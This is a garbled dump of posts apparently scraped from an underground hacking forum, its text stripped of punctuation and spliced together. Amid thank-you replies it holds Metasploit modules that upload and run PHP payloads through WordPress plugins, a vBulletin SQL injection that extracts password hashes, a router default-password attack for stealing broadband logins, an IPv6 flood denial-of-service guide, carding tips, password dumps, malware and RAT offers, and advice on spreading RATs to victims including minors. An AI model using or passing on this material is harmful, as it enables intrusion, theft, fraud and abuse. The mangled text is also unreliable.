txt and execute some command does not echo result and jump the original webpage why. 
codefire wrote hello guys going post the example symlink all php executable functions disabled including the symlink function too and php. 
php file not helping you override the disable function can symlink the server using cgi shell. 
this file contains the video well the shell used ing. 
nice man iwill try. 
wrote thanks mate saolun beyler. 
thanks for reading tutorial and have nice day attach attach codefire wrote hello everyone. 
thanks for reading tutorial and have nice day attach attach sorry the app cannot downloaded your country why help. 
this simple guide read somebody else facebook messages without any effort cheers mike nice thx for sharing. 
enjoy happy nice thread even though let the nooby's fly. 
enjoy happy nice thread. 
big you self pirateboy wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
thanks will check this out dude. 
thanks mate for this. 
introduction file upload vulnerability replying for the hidden content. 
huge email password dump sharing with you all huge email and password dump got hands about year ago. 
download dump here download this here download huge password list for use hash cracker here enjoy and please say thanx. 
thank you very munch that's good it's pefect. 
anyone tried yet sent from using tapatalk. 
screenshoot download saya akan coba. 
application name braindistrict paintsupreme. 
application name braindistrict ifxsupreme. 
com protection type serial packer protector non release type patch serial crack download link code. 
thanks for help hope its work. 
thanx for this thread. 
codefireok wrote hello everyone. 
now i'm gonna show you how send fake email with any email domain you want here first download the program updated version hide reply hide reply after downloading the program run and the program looks like this now fill all text field the application note click view after you fill all textfields then click send email button and wait till you got message box. 
please contact may interested paying you teach show this part and. 
love the this the job weldone. 
please look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank youplease look signature once thank you. 
love life let see the. 
thx for share bro cool. 
can't find the download link. 
let take look thanks for posting. 
thanks boy there imagine. 
thank you great post. 
having problen running python script showing this error. 
running script cmd windows getting csrf token traceback most recent call last file users vivek desktop whmcs. 
line user login file users vivek desktop whmcs. 
search type hidden name token value. 
group attributeerror 'nonetype' object has attribute 'group'. 
prince wrote facebook account dsdad weqreset hijack session day exploit only for attach config attach. 
has anyone received payout. 
awesome dude ist cool because you can penetrate test easily. 
thank you for sharing bro nice. 
cheers mike cool let's try out. 
thanks for sharing checking out can works device. 
also wanted see how works. 
thanks bro for this info. 
too much lengthy post. 
thanks sir nice app. 
thanks will try this edit link expired. 
will try this but for sharing. 
well let's try and see how good. 
work with gmail field and field data from your mail field name message field the message itself. 
nice one but may this not work old windows. 
thanks for posting sharing dude. 
thank's for sharing this. 
hello ihf its very easy way convert exe. 
video tutorial video youtube bsm. 
com watch bsm video virus scan. 
download here hope you like. 
color hey ihf for start this community wanna make random tuorials about botnet and want know wich one you would like see the first here little pool where you can vote for favorit bot the tutorial include full setup with pictures hosting download link clean version virusscan and maybe the source code color color have more then that one the pool. 
just thought they are good start more bots will come soon color. 
thanks for sharing this tutorial. 
you truly keep your namesake. 
cgvj jfjgjh jhffj hfjfjfjfjf. 
thanks lot edit actually not its the official exploit from. 
drake which needs adjustments work. 
this simple guide read somebody else facebook messages without any effort cheers mike showing error not showing again pls any other way. 
merry mass all frm team size ihf size good enjoy day exploits cool. 
com exploits this file part the metasploit framework and may subject redistribution and commercial restrictions. 
please see the metasploit framework web site for more information licensing and terms use. 
com framework require 'msf core' require 'msf core exploit php exe' class metasploit msf exploit remote rank include msf exploit remote include msf exploit phpexe def initialize info super update info info 'name' 'wordpress property php file upload vulnerability' 'description' this module exploits vulnerability found property. 
php file malicious user can upload file temp directory without authentication which results arbitrary code execution. 
'author' 'sammy forgit' initial discovery 'james fitts. 
com metasploit module 'license' msf license 'references' 'osvdb' 'bid' 'edb' 'url'. 
actualites wordpress plugins property shell upload vulnerability. 
html' 'payload' 'badchars' 'platform' 'php' 'arch' arch php 'targets' 'generic php payload 'arch' arch php 'platform' 'php' 'linux 'arch' arch 'platform' 'linux' 'mar register options optstring. 
new 'targeturi' true 'the full uri path wordpress' wordpress' self. 
class end def check uri target uri. 
path uri uri res send request cgi 'method' 'get' 'uri' uri content plugins property third party uploadify uploadify. 
php not res res. 
code return exploit checkcode unknown end return exploit checkcode appears end def exploit uri target uri. 
path uri uri peer rhost rport payload name rand text alpha. 
php php payload get write exec payload unlink self true data rex mime message. 
add part php payload application octet stream nil form data name filedata filename payload name data. 
add part uri content plugins property third party uploadify nil nil form data name folder post data data. 
gsub part part print status peer uploading payload payload name res send request cgi 'method' 'post' 'uri' uri content plugins property third party uploadify uploadify. 
php 'ctype' multipart form data boundary data. 
bound 'data' post data not res res. 
body payload name fail with exploit failure peer upload failed end upload uri res. 
body print status peer executing payload payload name res send request raw 'uri' upload uri 'method' 'get' end end. 
com framework require 'msf core' require 'msf core exploit php exe' class metasploit msf exploit remote rank include msf exploit remote include msf exploit phpexe def initialize info super update info info 'name' 'wordpress asset manager php file upload vulnerability' 'description' this module exploits vulnerability found asset manager. 
actualites wordpress plugins asset manager shell upload vulnerability. 
html' 'payload' 'badchars' 'platform' 'php' 'arch' arch php 'targets' 'generic php payload 'arch' arch php 'platform' 'php' 'linux 'arch' arch 'platform' 'linux' 'may register options optstring. 
class end def exploit uri target uri. 
add part php payload application octet stream nil form data name filedata filename payload name post data data. 
gsub part part print status peer uploading payload payload name res send request cgi 'method' 'post' 'uri' uri content plugins asset manager upload. 
body payload name fail with exploit failure peer upload failed end print status peer executing payload payload name res send request raw 'uri' uri content uploads assets temp payload name 'method' 'get' res and res. 
code fail with exploit failure peer execution failed end end end. 
can't see the pictures bro. 
attachment password password for zip will try now. 
don't ask for invites cardingzone was banned for ripping didn't rip anyone angry the quicker way use these and search for certain keywords. 
com and course don't forget google. 
identifying the place the card was issued from can done through various methods. 
com the way goes most sites with this trick choose any product all and the checkout give the real cvv info but incorrect billing address. 
deadmanindia wrote nic deface bro thanks bro. 
friend thank you much wonderfull. 
cheers mike let see. 
thank you for help. 
how does work sent from iphone using tapatalk. 
let try i'm working. 
thank you for the tut. 
people tell their hidden. 
seems like your isn't. 
omg thank you much needed this. 
thanx bro for this relly liked. 
internetnice wrote facebyte facebook account scraper. 
rwlly hope this works. 
thanks for sharing information cheers. 
the attempts are coming from one address will just block you out and retrieve false password. 
good have such knowledge. 
wrote friends table width free vps code added redeem fast register this site code given below. 
hope cheers mike table. 
cheers mike let's see how frank you are. 
com file yiapge tnx bro too sharing. 
thanks for sharing admin. 
codefire wrote blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
reply and see downloading link testing hide reply hide reply. 
thanks you brother for this. 
wow sounds amazing thnx. 
don't know this really works not but see this can help you out. 
this simple guide read somebody else facebook messages without any effort cheers mike hope. 
thanks for the postthanks for the postthanks for the postthanks for the post. 
after executing the command the homepage the google shows then then the website vulnerable this attack does not come then the site not vulnerable rfi. 
thank's borther love man. 
hope this really works. 
show download link plz. 
this first post great post bro thanks alot. 
get here hide reply hide reply url password hide reply hide reply big thanks. 
thanx for sharing there difference from ddoser and stresser. 
i'm gonna test and scan and then report. 
thx keep going awesome. 
thenk you bro bla bal bal. 
thanks bro ill try. 
how use video tutorial. 
com shk download the apk from bellow install that's all need seriously hit that button that's motivating factor don't think necessary for virus scan but for who skeptical here. 
searching for this all over net finally got here tnx dude. 
connectify lifetime pro cracked connectify connectify can easily act your primary router even repeater for your home router extending its range and providing internet access wherever you need. 
connect your home network enter the same name and password and hit start hotspot. 
devices will automatically connect the internet through either your connectify hotspot home router depending proximity. 
till now there were any real working connectify cracks existed earth. 
here another exclusive release from hax. 
made connectify came too with. 
how crack install the latest version connectify download and run connectify crack browse and select connectify installation path needed click activate pro button and wait till message box comes and close connectify crack right click blockhosts. 
bat file and run administrator this step important now restart your computer grin done enjoy lifetime connectify pro license notes you must run blockhosts. 
bat file administrator even though hosts file have already been modified the crack. 
because sometimes crack cannot make read only you cannot update connectify after cracking. 
download latest setup from and install instead updating. 
you must deactivate pro license before installing new version connectify otherwise your details will sent connectify developers crack supports supports both bit bit platforms not compatible with windows lower connectify. 
rar mirrors note always perform virus scan and download your own risk. 
thanks for the share dude. 
thanx bro good jod. 
user fara movie pass faramovie. 
bro your tutorial has been really great but the actual issue when download the darkcomet gets deleted windows automatically understand each and every step that specify thanks your depth explaination but its use gets deleted automatically windows removed mcafee turned the windows firewall off and did every damn thing prevent but all efforts vain what will the alternative this waiting for reply eliteseekers yahoo. 
love this one with better engine screws the fucking maga. 
pratham wrote disable your windows firewall and remove your antivirus shout have done already but still its same. 
hope one can get money via this. 
really let see the posts. 
thanks for share very good. 
can not get download link for spyeye mate. 
wrote table width hello friends this trick still working dont beleieve look cheers the below trick posted. 
this simple guide read somebody else facebook messages without any effort how mike. 
going try this lol. 
you have download this directly your phone just checking and assuming that the configuration when its the phone you put your gmail error please fix. 
thank you let see. 
love try this and hope its better than rat. 
lets see what you have here friend thanks for the share. 
can you please the link mate regards. 
prince chaddha wrote hidden content you must reply see linksfacebook account reset hijack session day exploit only for url attach config attach prince chaddha wrote hidden content you must reply see linksfacebook account reset hijack session day exploit only for url attach config attach. 
don't think you can log. 
read the tuts the hacking section. 
lets check out nice share. 
good share but already know. 
will try this now. 
thanks for you ill try. 
you have icq atention always post your contact. 
let's try this though don't think it'll work. 
thank you lets try out. 
thanks lot wrote ardamax keylogger. 
ejlidibi xepnt hodbfygjeqaqmg adueeduthanks lot wrote thanks lot wrote ardamax keylogger. 
ejlidibi xepnt hodbfygjeqaqmg thanks lot bro this really awesome one. 
prince chaddha wrote facebook account reset hijack session day exploit only for url attach config attach nice. 
there your download link for spyeye isnt working check and update fresh link. 
thanks bro you are the. 
will try this out asdap. 
hcglsmbbmxczm kzc cvzlcvnzcmb cmb. 
where the download link. 
lets see how this works wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort hide. 
gebjz table hide cheers mike. 
briphil wrote let's see how works out. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions advanced hacking tutorials tutorial hacking lol chat hack announcements some other awesome news share pages next new reply thread rating thread modes tutorial hacking lol chat hack virg offline junior member posts threads joined nov reputation location madrid country spain money. 
donate hot this post was last modified virg. 
exe conflicted conflicted virg offline junior member posts threads joined nov reputation location madrid country spain money. 
donate works you should get conflicted conflicted haxo offline junior member posts threads joined oct reputation location india money. 
donate lets see the content virg offline junior member posts threads joined nov reputation location madrid country spain money. 
donate lets see the content conflicted conflicted azeemeister offline junior member posts threads joined nov reputation location india country india money. 
donate this post was last modified azeemeister. 
troll checked out the link and says that the file has been removed. 
can someone pls give offline junior member posts threads joined aug reputation location usa country colombia money. 
nothing link any robbreel offline junior member posts threads joined nov reputation location nigeria country nigeria money. 
donate virg wrote looking other peoples watsapp chats let see your skill virg offline junior member posts threads joined nov reputation location madrid country spain money. 
donate now the link works conflicted conflicted thegolden offline junior member posts threads joined nov reputation location france country france money. 
donate very useful thanks for posting virg offline junior member posts threads joined nov reputation location madrid country spain money. 
donate realy helped want share. 
conflicted conflicted enter keywords search thread pages next new reply quick reply message type your reply this message here. 
hacker yesterday last post rajj read anyone's facebook message without hacking them still working yesterday last post heykarlihey tutorial how hack details pro. 
hakgod yesterday last post xvyctim hacking any ebay account just minute codefire last post rajj online exclusive hack redkid last post rajj hack almost everyone. 
every facebook and email via facebook hack sruthy last post pootr wireless hacking cracking wep wpa key via wifite tutorial neo jaguar codefire last post xvyctim how ethical password hacking and protecting ihatehissite last post ihatehissite hacking facebook pages codefire last post freddie hacking into computer with pictures codefire last post prasan view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
this simple guide read somebody else facebook messages without any effort cheers mike appreciate your work. 
could get that download link now. 
thanks man excited see. 
thanks thanks thanks thanks thanks. 
thanks mate i'm new all this could add you icq get tips thanks. 
lets hope this works will amusing. 
very nice thank you much. 
thanks for the code. 
nice one dude thanks master nice one thanks master. 
waiting for return skype and icq atention always post your contact. 
thx for the tutorials. 
hope this works wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike lets how works. 
thanks for this tutorial. 
thanx for sharing this. 
have good day bond benz wrote free working php script check valid emails and registred with paypal. 
don't see any link mate this thread where can download spyeye need download link mate. 
thanks for sharing appreciate. 
let see the link download for the sharing. 
thank you will test this out. 
thank you bro for this. 
thank you for this mate. 
thank you for sharing wrote table width guys today would like share method how verify your paypal without using your own credit card. 
download cheers mike table problem with donwload link. 
thank you bro need for create dictionary. 
thank you for the leak ever. 
you must reply see attachments. 
how use day plz explain. 
simsim show the hide text. 
tac wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
download cheers mike table wrote table width guys today would like share method how verify your paypal without using your own credit card. 
hidden content you must reply see links encountered with this article tutorials database while going through and after reading this article found the easy hack for bsnl with this article you are able hack bsnl broadband someone say your neighbour's bsnl brooadband account actually the person whose known vulnerable. 
here once you are able obtain the password victim you can easily use his bsnl connection and thus hack his bsnl broadband connection account. 
bsnl dataone broadband continues grow one the most popular broadband services india with high speed facilities upto mpbs. 
but large number users this service are vulnerable hacker attacks because discovering and hacking the vulnerable victims this network shockingly simple. 
you are bsnl broadband user then immediately assess the security your internet connection and take appropriate steps secure yourself. 
first lets see how simple hack bsnl dataone broadband usernames andpasswords. 
for this you shall need ipscanner tool called angry scanner hidden content you must reply see links anything similar. 
get your from hidden content you must reply see links step start angry scanner and goto options ports. 
type the first ports textbox and click. 
then goto options options the display section select only open ports and click. 
now the main screen put the scan range something. 
and click the start button. 
and the list that shall follow next are the victims. 
this example choose the range. 
you will surprised the number victims you discover. 
step pick the address any them and open your browser and type hidden content you must reply see links. 
the should replaced the values from the you are using. 
box will popup asking for username and password. 
enter the username admin and password admin. 
there high chance that you will able login with that username and password. 
admin admin the default username and password that set while manufacturing the adsl modem devices. 
what follows next the modem administration panel. 
simply search for the wan option and click. 
the next page you will find the username and password that user. 
now right click the page and click view source. 
mozilla opera this frame view frame source now the source code search for this input type password and the value field this input element will have the password its not there case link dsl adsl routers the search for this input type hidden name connection settings password value password and the value field will have the password well each steps take less than minute getting username passwords wont take even minutes and easier than sending mail. 
and this exposes the weak security bsnl broadband users. 
well this not weakness but more mis configuration which leads insecurity. 
you understand networking then you would probably realise that was merely logging into the remote administration service the modem and nothing else. 
this was not really hacking but simple search victims who are absolutely ignorant their weaksecurity the internet. 
most routers have option where remote management can disabled. 
other words you can only connect the configuration interface from the internal network not the wan internet side. 
you would definitely want make sure remote management notactive protect yourself. 
note smartax eventhough remote management disabled permits remote logins from over the internet. 
change your mode administration passwords immediately. 
the problem that the professionals bsnl are ignorant such simplicity networking and unable advise the users guide them take proper security measures leaving their customers and themselves absolutely unsecure. 
now lets check few more options related this issue. 
bsnl broadband modem can used two modes. 
rfc bridged mode and mode. 
the rfc bridged mode the device behaves like modem device that attached your computer and you use some dialup software dial into the isp through this modem. 
this from the and the adsl device good modem. 
this mode safer the username password are your and nothing the modem. 
the mode the adsl device becomes router distinct network device with many features enabled. 
this mode the username password stored the modem which will dial the isp and establish the internet connectivity. 
the computers will just connect this router who would their primary gateway. 
now this the mode where the risk exists. 
remote administration enabled the remote users from the internet can login this modems administration panel. 
now the main problem the default admin username password which most users dont change due ignorance. 
admin admin pair that works most cases giving you full access the modems internals. 
what follows next simple drinking glass orange juice. 
many users install firewalls and think they are safe but they fail understand that the firewall protects their not the router since the topology like router internet blink how should you secure yourself blink. 
use rfc bridged mode sufficient for you. 
change the default admin password your modem. 
disable wan ping reply. 
this will prevent the hackers from directly discovering your when the internet. 
disable remote configuration feature. 
check your broadband usage regular basis and compare with your own surfing schedules check whether someone else has used not. 
suspiscious usage indicated then immediately change your broadband password well. 
better suggestion would change broadband passwords regular basis. 
mister illusionist wrote tonight will post tuts botnet. 
did everything and everything set but why builder not working and please how join the vip session. 
learn more about php. 
org wiki php understand what file inclusion going show little example. 
php page when the user clicks the first link its going show the content. 
now when user clicks the page link she taken. 
php page the php script index. 
you can test this visiting. 
php page that would give error assuming the server administrator have not turned off show errors the php configuration. 
txt upload server and then visit something like this. 
txt note that the get rid the. 
here few examples get arguments manipulating. 
php use your imagination. 
php page index the php script made such way that only need edit page index page. 
check for the word check for the word. 
grgrg regege gegr egegegegegeg. 
thank you much neo. 
got the spy eye but cant see the images. 
download cheers mike table tanks. 
pratham wrote reply and copy code dance good hidden content cannot quoted. 
thnx don't copy and dump posts otherwise hang hehehe senx. 
thanks will check this out dude thanks will check this out dude. 
xmpp jabber otr codefire icq. 
xmpp jabber windows linux mac osx xmpp otr pidgin otr otr otr xmpp xmpp tor socks otr tor tor. 
link the link need. 
microsoft windows professional rtm english dvd iso bootable iso for install microsoft windows professional rtm english dvd iso build. 
iso size byte crc fcb sha abc eff fac note the names the distribution channels for their distribution microsoft hrm cena frev volume hrm cena frev windows professional activation serial crack coming soon. 
working activation for windows rtm final enterprise windows rtm final professional windows server datacenter standard make faster until works the kms server activation windows enterprise professional server manual full packs. 
the version professional change the key slmgr ipk. 
the version professional wmc change the key slmgr ipk gnbb yvd qjhx qhdg. 
the version the enterprise need change anything type this command this kms servers currently unavailable. 
wait for next kms server. 
unavailable slmgr skms kms. 
org unavailable slmgr skms. 
unavailable slmgr ato slmgr dli enjoy day. 
after day rerun this action procedure steps telodvighenija again. 
after next rerun again again and again download windows final rtm professional rtm english dvd iso mirror hide. 
net windows pro dvd. 
rar hide mirror hide. 
rar hide thanks for reading tutorial. 
due being new was wondering your opinion tox client have any you used has been popular via imageboard forums. 
tox chat client free opensource alternative skype allows you keep your conversations private away from three letter organizations. 
would like hear your opinion. 
just wanna see the hidden content. 
rave wrote wrote table width guys today would like share method how verify your paypal without using your own credit card. 
cheers mike table will for sure test this wrote table width guys today would like share method how verify your paypal without using your own credit card. 
download cheers mike table josh. 
cheers mike table will for sure test this josh. 
cheers mike table will for sure test this this link has been suspended pls send new link pls. 
hope will work real good. 
good ourad wrote tnx man for this informaton how download. 
note some people are beginning spam this forum. 
check around and see for yourself. 
thanks for this good tut. 
awesome joomla day lovely eheh. 
will like get copy maybe something new inside. 
nice post there bro girl dance. 
want try this exploit thank you. 
proof bro thanks and keep. 
sarfroz wrote bro have alrdy mentioned that tor and other proxy sofwares are blocked. 
none them are working aha. 
seems great and worth few tries. 
sup all sharing the full version burpsuite today. 
com watch feature player embedded pbkzvp xuci video depth burpsuite link download. 
com qxhrk virus scan report. 
yes bro some fake but not all. 
mastervendor wrote are online yahoo not always. 
you can send msg. 
hello ihf know ipv bad the idea behind was good but reality the technology incredibly insecure especially windows machines. 
this tutorial will teach you about the more dangerous side ipv and will cause windows machines lock and crash vulnerable machines windows some ipv has been eneabled vista other devices crashed printer doing this warned android seams immune believe ithings are also immune well macs most unix linux distros are also immune apart from some bsb enough rambling let's get started. 
will using tool called thc ipv comes pre installed backtrack but for some reason was broken install had mess with get working. 
here's how got working first make temp directory anywhere you like and that the terminal. 
then enter color code color wget. 
org releases thc ipv. 
download the required package use code rar zfxv thc ipv. 
extract the files then into lastly use code make then code make install that was the hard part believe not from your teminal window type color code color flood router eth make everything die. 
the tool runs floods the target network with ipv requests taking resources until few seconds later they are all exhausted and the computer freezes meaning the only way fix hard reset the computer. 
while the attack happening you will notice lots. 
appearing the terminal each one represents packets. 
replace eth with your network interface microsoft are aware the issue and far will not making any effort fix this. 
this tutorial for educational purposes only. 
take responsibility you use this information maliciously. 
thanks for the trick. 
thanks very much for this freebie. 
thanks for the freebie. 
lets see wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
oops doesnt work can anyone help get the email sms spam message. 
thank very much for post. 
php username jonas palm jonas. 
lets see you can figure the password out. 
this great must try this. 
how attain the information after friends have been affected where the info stored thank you. 
cheers pal great workl. 
show the content let try this. 
check this out thnks post. 
good thing take board yourself. 
tacoz wrote eset smart security keys enjoy urhn usa kbd pcb cmum sbv bnjn hpt amk xtx bbat bbps udrb agar jgpn gxfk bvkv ttu wtpf btsm uucf jjx rhx ajc ptt uecd download important choose the depending your system don't forget smack that. 
thanks you hope this work. 
true all are fake pages hacked tongue. 
thnks for this and for sharing. 
doe wrote yes first click download button and then freebit coin page will open now you have click don't have bitcoin address and then bitcoin wallet page will pop enter your valid email and choose your own password. 
thats all enjoy note dont forget ref feral code thanks sir. 
net images third eye. 
jpg very nyce bro. 
linux webvulscan windows linux xampp. 
wow good leet haxor. 
file not found the file you are looking for. 
may deleted the user the administrator. 
hello please open gateway. 
thanks bro will check out. 
thanks for sharing tutorial please give some credit post the adf. 
looks interesting lets see then. 
thanks admin really need this tools. 
html hide before use turn off antivirus run sandboxie for safe. 
thanks for help nice post. 
thanks man keep good work. 
thank for the post. 
but where can download this program from cant find link anywhere your original post. 
amikewacant the tricks wrote table width can hello friends this trick still working dont beleieve look the below trick posted. 
its rat dont download. 
salue sunt aici amintesc exista romani site. 
thank you for posting this. 
thats interesting will sure check this out. 
hope this time i'll get done. 
hope this works cheers. 
i've tried most them they are all not working for. 
thanks dude edit link seems dead. 
hope working again thanks for sharing. 
but time listen about that shell. 
lets see how works out. 
still working right now. 
codefire wrote assume that guys already got your rat setup and working condition fud. 
some websites which you can spread your server not good for lot bots but you can get some rich pedos. 
you will get lot teens from there. 
still good but high risk getting banned from admin lot victims here. 
not really good but you can try. 
hello sir kya muje ekk tutorial sakte hai complete defacement from with shell upload. 
want fuk with china and pak. 
lets see what happened. 
pamhoso bypass everything the server. 
lets see what you've got here. 
i'm new but look great. 
looking buy australia company emails and password. 
pls contact can deal. 
thnx don't copy and dump posts otherwise hang hehehe thnx. 
wsoso password for file tacoz sure smack that thanks. 
it's good see such valuable information this thread. 
thanks admin for making this thread share knowledge. 
code dorks dork dorks code scan recornition code code. 
code code anyware code code code code. 
code protential vuln vuln. 
net projects head dobj linuxinstaller code linux code desktop code code. 
code dorks the link does not work. 
thanks ill try out. 
cool really hope works you have described. 
will download and check out before making further comments. 
thank you man for sharing. 
lets test this out. 
elite wrote have done already but still its same bro couls please hel share good crypter and binder use with cybergate please reply waiting for reply eagerly. 
thnks the soft workk. 
thanks buddy for this but did you get paid them. 
with this tools something sure codefire wrote cpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hide reply hide reply password hide reply hide reply show the link man. 
thank you for this bro. 
only see fowarding and cnt find port foward. 
thnx that's what need thnx that's what need thanx man. 
let see shit duud aisdiasidubas. 
com watch feature player embedded pbkzvp xuci video depth burpsuite link download virus scan report. 
going have look these links and invite codes thank you. 
yees let try then comment good repla. 
thanks for the tut enjoyed reading. 
com works the best for and managed access blocked websites freely and anonymously. 
bond benzhkj wrote free working php script check valid emails and registred with paypal. 
hope the link work. 
wow love that amazing. 
png vbs ftp meterpreter. 
this could very useful. 
thank you for the method. 
nice one man you got. 
this kryptr hide viruses and rats used the anti virus. 
wrote color the main drivers for botnets are for recognition and financial gain. 
reading this color nice tut. 
madly needed some more. 
how purposley spread malware other computer networks. 
png hello friends long time after came here and thinking write something useful for you guys. 
thanks sir nice share. 
wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
thanks bro good job checking. 
woah nelly looks like nice one. 
been hacked around here with hakops rat downloaded all these tricky indian. 
phoenix wrote application name advanced all pdf. 
january url enjoy thankyou nice share. 
omg thanks bro rep. 
interesting but sound like phising site. 
ill have look this see its still working thanks. 
dam confused how use. 
really nice post dear. 
have been searching for this particular script. 
nice one there thanks. 
but why use nigeria. 
mourad wrote tnx man for this informaton nice. 
well said sir thanks for the info. 
bond benz wrote rdp cracker included with user and password list download kjhgfd. 
haxorthanks let see wrote posting this here coz thought may useful for someone else. 
download link virus scan result. 
thanks for this guide. 
that's good page that there. 
username password can not found our database try recover your password 'password reminder'. 
this trojan bitcoin stealer. 
wrote table width nice hello friends this trick still working dont beleieve look the below trick posted. 
thanx for this information. 
wrote table width hello friends mium vpnhello everybody here i'm going post mium vpn. 
you can connect austria chile france iceland isle man italy luxemburg poland romania spain sweden switzerland ukranie united kingdom united states you want download here hidden content cannot quoted. 
just install the vpnium. 
table cheers mike dikhao hum bhi dekhe kya bata rahe. 
thanks for the post and thread share bro. 
thank you does this still work. 
need see the hidden content. 
thanks for sharing hope gud. 
wonder how this will work. 
checking out can some tell much about how use the pristine tinz pls anybody drop package drop tutorial too about how make use not many will become novices like this phishing package consign. 
check virus scan here. 
link not working update please. 
what the zip password. 
let see how its working and give the feed back link dead notworking. 
didnt see any links. 
can have this pls. 
very good liked even thank you. 
thanks bro rea iggy. 
admin wrote the first not android stealer ever created raziel presents razstealer. 
update hidden content cannot quoted. 
whats new you can now enable the feature auto start the stealer when the phone boots you can now enable the feature delete the zip file after uploading sms thread fixed and optimized sms stealer now includes date and fixed your trying dump tutorial wanna give you please need this machine can have. 
free vps wow hope stays there for long time. 
thanks for the content. 
any chance for new. 
posting see the content. 
let see pretty please. 
roll going take over thanks for the post man. 
good stuff brother will tell after tring. 
codefire wrote first download reshacker then open reshacker and select ''open'' now select winrar. 
exe now press ctrl and type please purchase without then click search and you will find some stuff. 
like here don't anything yet let explain how. 
right click the red squared text like this now click delete resource now save the file that doesn't work save the file elsewhere winrar. 
wrote thnx hard work and wil see its still work until now width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike how its still work cant enter find gave this msg this adf. 
hope good stuff are there check. 
codefire wrote spy your friend whatsapp account thanks whatsapp verifies phone mac address. 
you try change thanks whatsapp will again ask you confirm your phone number. 
code title vbulletin verify email before registration plugin sql injection date september version any vbulletin. 
version which has the plugin installed. 
php author dave the vulnerability resides the register form complete hook and some other hooks. 
the post get data not sanitized before being used queries. 
php emailcode sqli poc. 
php emailcode union select null concat username password salt null null null null from user where userid now look the source the page and find vulnerable hooks profile updatepassword complete email field when you want change your email address after being logged. 
register addmember complete after submitting the final registration form. 
register addmember process register form complete this example register start email confirmation form register. 
thanks bro this good. 
thank you for the tut bro. 
friend would love learn this trick and many other boast hack knowledge john. 
hello guys going post the example symlink all php executable functions disabled including the symlink function too and php. 
com dvpv yodc symlink. 
rar hide this file contains the video well the shell used demonstrating. 
codefire wrote shitty logo ythanks know well you're here for the program. 
thank you appreciate the post. 
oddio quanto sei demente bastardo figlio puttana. 
show show show show show show. 
wrote table width hello friends asfasgasg this trick still working dont beleieve look the below trick posted. 
it's working you have payouts history. 
thanks dude hope will work. 
this method fetch reply will just fetch stupid replies. 
link not working anymore shit. 
thanks bro and love yoi. 
lolz super like cool. 
sound like gud its workng. 
i'll check and post about later. 
need someone help out icq. 
tnx for the information. 
thanks bro you the best. 
crownwealth wrote vey much will try this for real thankk you. 
well whenever comes facebook hacks run run run run get get get. 
like that thanks and best. 
there new exploit for newer version. 
made day dude this really interesting tool. 
wanna give try thanks for posting. 
cheers mike show the content. 
this works you are genius. 
thanks bro update the link please. 
error can't find the page you're looking for. 
check out our help center and forums for help head back home. 
thanks i'm curious give try anyway. 
looks like bit fun. 
cheers mike will try. 
very complete tutorial but there any good exploit pack around again tried some without success. 
thx man try this. 
this simple guide read somebody else facebook messages without any effort cheers mike thanks. 
thanks for the info mate. 
this tut has been submitted sen haxor now days most the linux kernel server show this error when you try symlink the server. 
conf and forbidden error here download link all shell and script used hidden content you must reply see this content greetz cyberace legion who made make this tut and team indishell and all indian hackers. 
thanks regards sen haxor. 
many thanks man great work. 
i've been looking all over for this thanks for the share. 
will try this out now. 
don't for downloading link aikido downloading link updated hehehe. 
for example i'll using this one. 
et's see how works out. 
you can download from hidden content you must reply see links jondo jondo open source and free charge program for windows linux and macos. 
you can download from hidden content you must reply see links. 
trying now lets hope works. 
does this really works. 
thanks for this bro ill check out. 
still working sent from nexus using tapatalk. 
verry good thanks bro. 
thank you guys rockman. 
learning alot from here. 
joyjeus wrote how does work. 
please provide the link. 
wordprees uploader tool shot attach config attach enjoy. 
bond benz wrote download rep don't forget thx bro. 
need light see through. 
see this even works. 
lol earning money giving fake links its fake. 
thanks very much thanks very much. 
thank you for this tool. 
but maybe this not available usa. 
txt format download webvulscan. 
codefire wrote indian hack forums article arham muhammad shared intro basics remote code execution and how develops exactly how attacker get advantage over this vulnerability and misuse prevention and filtration conclusion intro the sic intr remote code execution yet another common vulnerability existing wide range web apps the current era. 
most probably will try spawn shell the targetted server gain full advantages his her blackhat stuff supposing attack the slave host code passthru get 'attacker' this will the work some other cases like the one code isset admin could also exploited with great ease the attacker just have spoof the variable from the server request and that's not all difficult being get variable code url this will and for the cookies thingy it's same. 
php url inject you may notice some additional funcs used inject these are execute and produce successful result would help and bypass magic quotes func and stripslashes too that would possibly lot good the attacker argv header target argv file argv var argv log argv shell argv command argv agent lwp useragent new exec agent get exec exec agent get exec die host seems down print injected successfully print check the shell manually. 
below example what exactly happens when inclusion performed such case indent since the code adding extensions after file variable means would adding. 
txt thus making the exploitation dumb simple would make the request looks like code url where such case dont exist now the attacker will eliminate the extension successfully exploit the issue posioning null bytes the request made below how the attacker will manage code url this would make the request eliminate the additional extension and would successfully exploit the issue prevention and filtration prevention it's better design what ever form such way that sanitizes and filters user input before writing actually executing the request the server. 
code phpinfo now the file under htmlentities strip tags stripslashes protection then this will make the request the attacker totally dumb and course use supposingly simple filtration pattern code. 
look forward giving this shot tonight. 
what need windows cain and abel oxid. 
home step finding the target. 
